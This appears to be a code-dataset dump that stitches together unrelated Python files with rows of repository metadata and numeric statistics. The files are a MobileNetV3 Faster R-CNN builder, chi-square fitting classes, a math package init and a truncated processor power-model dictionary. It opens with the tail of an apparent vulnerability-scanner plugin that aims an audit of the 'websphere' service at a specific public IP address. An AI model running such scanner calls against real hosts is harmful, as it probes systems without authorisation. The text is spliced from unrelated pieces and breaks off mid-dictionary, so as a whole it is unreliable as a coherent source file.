if __name__ == '__main__':
from dummy import *
audit(assign('websphere', 'http://211.140.31.239:80/')[1])
| 158.4
| 5,915
| 0.734975
| 1,754
| 7,920
| 3.305587
| 0.168757
| 0.073474
| 0.072956
| 0.06209
| 0.557951
| 0.520352
| 0.489997
| 0.457917
| 0.430493
| 0.369955
| 0
| 0.33691
| 0.034975
| 7,920
| 50
| 5,916
| 158.4
| 0.421693
| 0.033712
| 0
| 0
| 0
| 0.1
| 0.917237
| 0.814342
| 0
| 1
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.075
| 0
| 0.15
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7ebe60c4477f6f79bbef103c5cceda0fe284bc0c
| 5,527
|
py
|
Python
|
ModelMobilenetV3.py
|
mhyzy155/02456DeepLearningObjDet
|
efd49590dad6c60654ceb532ee0b10d1d5093db2
|
[
"Apache-2.0"
] | null | null | null |
ModelMobilenetV3.py
|
mhyzy155/02456DeepLearningObjDet
|
efd49590dad6c60654ceb532ee0b10d1d5093db2
|
[
"Apache-2.0"
] | null | null | null |
ModelMobilenetV3.py
|
mhyzy155/02456DeepLearningObjDet
|
efd49590dad6c60654ceb532ee0b10d1d5093db2
|
[
"Apache-2.0"
] | null | null | null |
import torchvision.models as models
from torchvision.models.detection.rpn import AnchorGenerator
from torchvision.ops import MultiScaleRoIAlign
from torchvision.models.detection import FasterRCNN
class ModelMobileNetV3():
@classmethod
def get_model(cls, num_classes):
# load a pre-trained model for classification and return
# only the features
backbone = models.mobilenet_v3_small(pretrained=True).features
# FasterRCNN needs to know the number of
# output channels in a backbone. For mobilenet_v2, it's 1280
# so we need to add it here
backbone.out_channels = 576
# let's make the RPN generate 5 x 3 anchors per spatial
# location, with 5 different sizes and 3 different aspect
# ratios. We have a Tuple[Tuple[int]] because each feature
# map could potentially have different sizes and
# aspect ratios
anchor_generator = AnchorGenerator(sizes=((32, 64, 128, 256, 512),),
aspect_ratios=((0.5, 1.0, 2.0),))
#anchor_generator = AnchorGenerator(sizes=((128, 256, 512),),
# aspect_ratios=((0.5, 1.0, 2.0),))
# let's define what are the feature maps that we will
# use to perform the region of interest cropping, as well as
# the size of the crop after rescaling.
# if your backbone returns a Tensor, featmap_names is expected to
# be [0]. More generally, the backbone should return an
# OrderedDict[Tensor], and in featmap_names you can choose which
# feature maps to use.
roi_pooler = MultiScaleRoIAlign(featmap_names=['0'],
output_size=7,
sampling_ratio=2)
# put the pieces together inside a FasterRCNN model
model = FasterRCNN(backbone,
num_classes=num_classes,
rpn_anchor_generator=anchor_generator,
box_roi_pool=roi_pooler,
rpn_pre_nms_top_n_train=20,
rpn_pre_nms_top_n_test=10,
rpn_post_nms_top_n_train=20,
rpn_post_nms_top_n_test=10)
#model.roi_heads.mask_predictor = None
return model
class ModelMobileNetV3L():
@classmethod
def get_model(cls, num_classes):
backbone = models.mobilenet_v3_large(pretrained=True).features
backbone.out_channels = 960
anchor_generator = AnchorGenerator(sizes=((32, 64, 128, 256, 512),),
aspect_ratios=((0.5, 1.0, 2.0),))
roi_pooler = MultiScaleRoIAlign(featmap_names=['0'],
output_size=7,
sampling_ratio=2)
model = FasterRCNN(backbone,
num_classes=num_classes,
rpn_anchor_generator=anchor_generator,
box_roi_pool=roi_pooler,
rpn_pre_nms_top_n_train=20,
rpn_pre_nms_top_n_test=10,
rpn_post_nms_top_n_train=20,
rpn_post_nms_top_n_test=10)
return model
class ModelMobileNetV3L_int8():
@classmethod
def get_model(cls, num_classes):
# load a pre-trained model for classification and return
# only the features
backbone = models.quantization.mobilenet_v3_large(pretrained=False).features
# FasterRCNN needs to know the number of
# output channels in a backbone. For mobilenet_v2, it's 1280
# so we need to add it here
backbone.out_channels = 960
# let's make the RPN generate 5 x 3 anchors per spatial
# location, with 5 different sizes and 3 different aspect
# ratios. We have a Tuple[Tuple[int]] because each feature
# map could potentially have different sizes and
# aspect ratios
anchor_generator = AnchorGenerator(sizes=((32, 64, 128, 256, 512),),
aspect_ratios=((0.5, 1.0, 2.0),))
#anchor_generator = AnchorGenerator(sizes=((128, 256, 512),),
# aspect_ratios=((0.5, 1.0, 2.0),))
# let's define what are the feature maps that we will
# use to perform the region of interest cropping, as well as
# the size of the crop after rescaling.
# if your backbone returns a Tensor, featmap_names is expected to
# be [0]. More generally, the backbone should return an
# OrderedDict[Tensor], and in featmap_names you can choose which
# feature maps to use.
roi_pooler = MultiScaleRoIAlign(featmap_names=['0'],
output_size=7,
sampling_ratio=2)
# put the pieces together inside a FasterRCNN model
model = FasterRCNN(backbone,
num_classes=num_classes,
rpn_anchor_generator=anchor_generator,
box_roi_pool=roi_pooler,
rpn_pre_nms_top_n_train=20,
rpn_pre_nms_top_n_test=10,
rpn_post_nms_top_n_train=20,
rpn_post_nms_top_n_test=10)
#model.roi_heads.mask_predictor = None
return model
| 47.239316
| 85
| 0.574091
| 654
| 5,527
| 4.649847
| 0.233945
| 0.023676
| 0.027622
| 0.023676
| 0.866491
| 0.866491
| 0.866491
| 0.854982
| 0.854982
| 0.854982
| 0
| 0.04418
| 0.361136
| 5,527
| 116
| 86
| 47.646552
| 0.817049
| 0.355889
| 0
| 0.819672
| 0
| 0
| 0.000882
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04918
| false
| 0
| 0.065574
| 0
| 0.213115
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
adaee3da37d023c6bb22111ceded9201e1bfb6c3
| 6,047
|
py
|
Python
|
regression.py
|
bguphysicslab/bgu_physics_lab_b
|
5dad736db15d79eea254a0056587d8e60854ff6d
|
[
"MIT"
] | null | null | null |
regression.py
|
bguphysicslab/bgu_physics_lab_b
|
5dad736db15d79eea254a0056587d8e60854ff6d
|
[
"MIT"
] | null | null | null |
regression.py
|
bguphysicslab/bgu_physics_lab_b
|
5dad736db15d79eea254a0056587d8e60854ff6d
|
[
"MIT"
] | null | null | null |
from matplotlib.offsetbox import AnchoredText
import numpy as np
import matplotlib.pyplot as plt
from iminuit import Minuit, describe
from iminuit.util import make_func_code
class Chi2Reg: # This class is like Chi2Regression but takes into account dx
# this part defines the variables the class will use
def __init__(self, model, x, y, dx, dy):
self.model = model # model predicts y value for given x value
self.x = np.array(x) # the x values
self.y = np.array(y) # the y values
self.dx = np.array(dx) # the x-axis uncertainties
self.dy = np.array(dy) # the y-axis uncertainties
self.func_code = make_func_code(describe(self.model)[1:])
# this part defines the calculations when the function is called
def __call__(self, *par): # par are a variable number of model parameters
self.ym = self.model(self.x, *par)
chi2 = sum(((self.y - self.ym) ** 2) / (self.dy ** 2)) # chi2 is now Sum of: f(x)-y)^2/(uncert_y^2)
return chi2
# this part defines a function called "show" which will make a nice plot when invoked
def show(self, optimizer, x_title="X", y_title="Y", goodness_loc=2):
self.par = optimizer.parameters
self.fit_arg = optimizer.fitarg
self.chi2 = optimizer.fval
self.ndof = len(self.x) - len(self.par)
self.chi_ndof = self.chi2 / self.ndof
self.par_values = []
self.par_error = []
text = ""
for _ in (self.par):
self.par_values.append(self.fit_arg[_])
self.par_error.append(self.fit_arg["error_" + _])
text += "%s = %0.4f \u00B1 %0.4f \n" % (_, self.fit_arg[_], self.fit_arg["error_" + _])
text = text + "\u03C7\u00B2 /ndof = %0.4f(%0.4f/%d)" % (self.chi_ndof, self.chi2, self.ndof)
self.func_x = np.linspace(self.x[0], self.x[-1], 10000) # 10000 linearly spaced numbers
self.y_fit = self.model(self.func_x, *self.par_values)
plt.rc("font", size=16, family="Times New Roman")
fig = plt.figure(figsize=(8, 6))
ax = fig.add_axes([0, 0, 1, 1])
ax.plot(self.func_x, self.y_fit) # plot the function over 10k points covering the x axis
ax.scatter(self.x, self.y, c="red")
# ax.errorbar(self.x, self.y, self.dy, self.dy,fmt='none',ecolor='red', capsize=3) typo here I think! dy twice instead of dy, dx
ax.errorbar(self.x, self.y, self.dy, self.dx, fmt='none', ecolor='red', capsize=3)
ax.set_xlabel(x_title, fontdict={"size": 21})
ax.set_ylabel(y_title, fontdict={"size": 21})
anchored_text = AnchoredText(text, loc=goodness_loc)
ax.add_artist(anchored_text)
plt.grid(True)
class EffVarChi2Reg: # This class is like Chi2Regression but takes into account dx
# this part defines the variables the class will use
def __init__(self, model, x, y, dx, dy):
self.model = model # model predicts y value for given x value
self.x = np.array(x) # the x values
self.y = np.array(y) # the y values
self.dx = np.array(dx) # the x-axis uncertainties
self.dy = np.array(dy) # the y-axis uncertainties
self.func_code = make_func_code(describe(self.model)[1:])
self.h = (x[-1] - x[
0]) / 10000 # this is the step size for the numerical calculation of the df/dx = last value in x (x[-1]) - first value in x (x[0])/10000
# this part defines the calculations when the function is called
def __call__(self, *par): # par are a variable number of model parameters
self.ym = self.model(self.x, *par)
df = (self.model(self.x + self.h, *par) - self.ym) / self.h # the derivative df/dx at point x is taken as [f(x+h)-f(x)]/h
chi2 = sum(((self.y - self.ym) ** 2) / (self.dy ** 2 + (df * self.dx) ** 2)) # chi2 is now Sum of: f(x)-y)^2/(uncert_y^2+(df/dx*uncert_x)^2)
return chi2
# this part defines a function called "show" which will make a nice plot when invoked
def show(self, optimizer, x_title="X", y_title="Y", goodness_loc=2):
self.par = optimizer.parameters
self.fit_arg = optimizer.fitarg
self.chi2 = optimizer.fval
self.ndof = len(self.x) - len(self.par)
self.chi_ndof = self.chi2 / self.ndof
self.par_values = []
self.par_error = []
text = ""
for _ in (self.par):
self.par_values.append(self.fit_arg[_])
self.par_error.append(self.fit_arg["error_" + _])
text += "%s = %0.4f \u00B1 %0.4f \n" % (_, self.fit_arg[_], self.fit_arg["error_" + _])
text = text + "\u03C7\u00B2 /ndof = %0.4f(%0.4f/%d)" % (self.chi_ndof, self.chi2, self.ndof)
self.func_x = np.linspace(self.x[0], self.x[-1], 10000) # 10000 linearly spaced numbers
self.y_fit = self.model(self.func_x, *self.par_values)
plt.rc("font", size=16, family="Times New Roman")
fig = plt.figure(figsize=(8, 6))
ax = fig.add_axes([0, 0, 1, 1])
ax.plot(self.func_x, self.y_fit) # plot the function over 10k points covering the x axis
ax.scatter(self.x, self.y, c="red")
# ax.errorbar(self.x, self.y, self.dy, self.dy,fmt='none',ecolor='red', capsize=3) typo here I think! dy twice instead of dy, dx
ax.errorbar(self.x, self.y, self.dy, self.dx, fmt='none', ecolor='red', capsize=3)
ax.set_xlabel(x_title, fontdict={"size": 21})
ax.set_ylabel(y_title, fontdict={"size": 21})
anchored_text = AnchoredText(text, loc=goodness_loc)
ax.add_artist(anchored_text)
plt.grid(True)
if __name__ == "__main__":
np.random.seed(42)
X = np.linspace(1,6,5)
dX = 0.1 * np.ones(len(X))
y = 2*X + np.random.randn(len(X))
dy = abs(np.random.randn(len(X)))
fun = lambda X,a,b: a*X + b
reg = Chi2Reg(fun,X,y,dX,dy)
opt = Minuit(reg)
opt.migrad()
reg.show(opt)
plt.show()
| 51.245763
| 150
| 0.601951
| 956
| 6,047
| 3.693515
| 0.183054
| 0.035684
| 0.028321
| 0.016992
| 0.857547
| 0.847918
| 0.847918
| 0.847918
| 0.847918
| 0.847918
| 0
| 0.031834
| 0.257152
| 6,047
| 118
| 151
| 51.245763
| 0.75423
| 0.256491
| 0
| 0.755102
| 0
| 0
| 0.053805
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061224
| false
| 0
| 0.05102
| 0
| 0.153061
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
adc4263e075498caaff77532766e0b3f32f7b9b4
| 390
|
py
|
Python
|
grayscale/clang/math/__init__.py
|
KennethanCeyer/grayscale
|
646a11ea47f2120f317e554c736d8054aa55c4c4
|
[
"MIT"
] | null | null | null |
grayscale/clang/math/__init__.py
|
KennethanCeyer/grayscale
|
646a11ea47f2120f317e554c736d8054aa55c4c4
|
[
"MIT"
] | null | null | null |
grayscale/clang/math/__init__.py
|
KennethanCeyer/grayscale
|
646a11ea47f2120f317e554c736d8054aa55c4c4
|
[
"MIT"
] | null | null | null |
from grayscale.clang.math.sum import sum as sum
from grayscale.clang.math.mean import mean as mean
from grayscale.clang.math.pow import pow as pow
from grayscale.clang.math.sqrt import sqrt as sqrt
from grayscale.clang.math.std import std as std
from grayscale.clang.math.var import var as var
from grayscale.clang.math.min import min as min
from grayscale.clang.math.max import max as max
| 43.333333
| 50
| 0.815385
| 72
| 390
| 4.416667
| 0.194444
| 0.327044
| 0.45283
| 0.553459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123077
| 390
| 8
| 51
| 48.75
| 0.929825
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
adc69075bb9d18fc1f8957ccf51af3d604e6f271
| 68,633
|
py
|
Python
|
benchmarks/SimResults/combinations_spec_rr/oldstuff/cmp_bwavesgccmcfleslie3d/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/combinations_spec_rr/oldstuff/cmp_bwavesgccmcfleslie3d/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/combinations_spec_rr/oldstuff/cmp_bwavesgccmcfleslie3d/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 4.72345e-06,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202693,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 2.02403e-05,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.34756,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.601848,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.345177,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.29459,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.343547,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.54945,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 3.82383e-06,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0125993,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0911113,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0931798,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0911151,
'Execution Unit/Register Files/Runtime Dynamic': 0.105779,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.220164,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.565763,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.5742,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00392899,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00392899,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00344044,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00134186,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00133853,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0126369,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0370172,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0895761,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.69781,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.337399,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.304241,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.19708,
'Instruction Fetch Unit/Runtime Dynamic': 0.78087,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0691229,
'L2/Runtime Dynamic': 0.0155229,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.94892,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.32537,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0877333,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0877334,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.36491,
'Load Store Unit/Runtime Dynamic': 1.84577,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.216335,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.432671,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0767781,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0775335,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.354269,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0561491,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.645502,
'Memory Management Unit/Runtime Dynamic': 0.133683,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 23.3878,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.30499e-05,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0177725,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.179941,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
